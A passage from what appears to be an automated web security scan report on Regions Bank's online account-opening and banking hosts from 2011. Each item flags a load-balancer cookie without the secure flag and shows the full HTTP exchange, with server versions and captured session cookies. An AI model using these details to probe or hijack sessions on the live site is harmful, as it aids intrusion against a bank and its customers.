Host:   https://secureapps.regions.com
Path:   /oao/Images/helpIcon.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/helpIcon.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 326
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a......l."w.3.....w`..Y..]....K.....u[.    .....Q..N..................W..}.<........{a................`..f.?..T...............k.!..x..._........U...................................................
...[SNIP]...

5.35. https://secureapps.regions.com/oao/Images/loading7.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/loading7.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/loading7.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2246
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89aQ....?...............w.....H..h..r........X........*....................5..+.....i..X..;..K..............s..l.....<..L.................).....Y........f.....@.....8..H.....y...........I........W.
...[SNIP]...

5.36. https://secureapps.regions.com/oao/Images/yourinformation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/yourinformation.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/yourinformation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 4021
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:06 GMT

GIF89a............................sss...VVV.......l".....DDDD..f....w3........U.`......w..........U.fff......!.......,............'.di.h..l..p,..c......}..m0.>......9......&.;./($...QGx...hs..    ....oT.
...[SNIP]...

5.37. https://secureapps.regions.com/oao/Scripts/jquery.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Scripts/jquery.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Scripts/jquery.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 29856
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/*
* jQuery 1.2.3 - New Wave Javascript
*
* Copyright (c) 2008 John Resig (jquery.com)
* Dual licensed under the MIT (MIT-LICENSE.txt)
* and GPL (GPL-LICENSE.txt) licenses.
*
* $Date: 20
...[SNIP]...

5.38. https://secureapps.regions.com/oao/Scripts/thickbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Scripts/thickbox.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Scripts/thickbox.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 17069
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/*
* Thickbox 3.1 - One Box To Rule Them All.
* By Cody Lindley (http://www.codylindley.com)
* Copyright (c) 2007 cody lindley
* Licensed under the MIT License: http://www.opensource.org/licen
...[SNIP]...

5.39. https://secureapps.regions.com/oao/app01.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app01.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/app01.aspx?type=prefplus HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:18:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; domain=secureapps.regions.com; path=/; secure; HttpOnly
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 48498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...

5.40. https://secureapps.regions.com/oao/app02.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/app02.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/app02.aspx?type=savings HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=savings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 76388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...

5.41. https://secureapps.regions.com/oao/images/arrowOrange.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/arrowOrange.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/arrowOrange.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 60
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a..    .....f..........!.......,......    ........-..49v.).;

5.42. https://secureapps.regions.com/oao/images/bgDot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/bgDot.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/bgDot.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 46
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a.............!.......,.................;

5.43. https://secureapps.regions.com/oao/images/continue.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/continue.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/continue.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555542668:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 407
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:23 GMT

GIF89aG...............]..`....V.....wl."..f.....D......w.3......[.    d....i..T.....A..N.....rq.*.........U.....!.......,....G........e.g.h..l....}...x...7..`.....-.+a.t.. a2...".........=B..o..p>L    ....
...[SNIP]...

5.44. https://secureapps.regions.com/oao/images/ehl_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/ehl_logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/ehl_logo.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; secureapps.regions.com-ssl=R54947255; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555551873:ss=1305555542668

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 595
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:15 GMT

GIF89a.........[[[...\\\MMM......ttt......```hhhmmm]]]...WWW___......KKK|||......jjj...{{{~~~.........VVV...............XXXlllRRR...xxxQQQ............yyy..................vvvbbb......iii.............
...[SNIP]...

5.45. https://secureapps.regions.com/oao/images/error.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/error.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/error.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 299
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:23 GMT

GIF89a..........,........}y....`[....E<....... ..............ro.SM.......'..................................!.......,.......... ...40U:)."8.. .UgVve:$~.
...d8.N`.Q...%..h0....    ...O...\...........s%
...[SNIP]...

5.46. https://secureapps.regions.com/oao/images/homepage.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/homepage.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/homepage.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/ErrorPage.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555620131:ss=1305555542668; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 632
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:20:42 GMT

GIF89a.........U`........]....D..w..............f......w.3...[.    d....T........B..N....?.........l."...U.....!.......,...............g.h..l..p,.ht}...|..@........k.Q:.P..u.X;.....&..S..-7W...Q..M..<..
...[SNIP]...

5.47. https://secureapps.regions.com/oao/images/icon_secure.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/icon_secure.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/icon_secure.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 77
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:18 GMT

GIF89a    .............i....!.......,....    .........1-;.....n..#.4b.F"x.........;

5.48. https://secureapps.regions.com/oao/images/loadingAnimation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/images/loadingAnimation.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/images/loadingAnimation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pyqokfmici4cwr45lj5pm1is; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555542668:ss=1305555542668; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 5886
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:17 GMT

GIF89a......................................................................................................!..NETSCAPE2.0.....!...
...,.......... .@Ri.h..l..p,.tm..#6N......+.r..rD4...h..@F.Cj.z]L.
...[SNIP]...

5.49. https://secureapps.regions.com/oao/scripts/wtbase.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/scripts/wtbase.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/scripts/wtbase.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 17051
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:01 GMT

function DcsInit() {
this.dcsid = "dcs4b71fc10000gs8u88h5t1k_6n2i";
this.domain = "statse.webtrendslive.com";
this.enabled = true;
this.exre = (function() {
if (window.Reg
...[SNIP]...

5.50. https://secureapps.regions.com/oao/styles/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/styles/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/styles/main.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 10689
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:57 GMT


img{border:none; padding:0px; margin:0px;}

body {background: #fff; font-family: Arial; color: #444; font-size: 1em; margin:0; padding: 0;}

A:link {color: #580; text-decoration: none;}
A:activ
...[SNIP]...

5.51. https://secureapps.regions.com/oao/styles/thickbox.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/styles/thickbox.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/styles/thickbox.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 4016
Content-Type: text/css
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:55 GMT

/* ----------------------------------------------------------------------------------------------------------------*/
/* ---------->>> global settings needed for thickbox <<<-------------------------
...[SNIP]...

5.52. https://securebank.regions.com/SystemUnavailable.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /SystemUnavailable.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SystemUnavailable.aspx?ResultCode=VALIDATIONERROR HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: securebank.regions.com-https=R890651000; ASP.NET_SessionId=rxyjhw55ndvthz45fybes045

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 4559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
   <HEAD>
       <title>Regions Online Banking</title>
       <link href="https://secureb
...[SNIP]...

5.53. https://securebank.regions.com/VAM/2_0_2/VAM.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAM.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /VAM/2_0_2/VAM.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
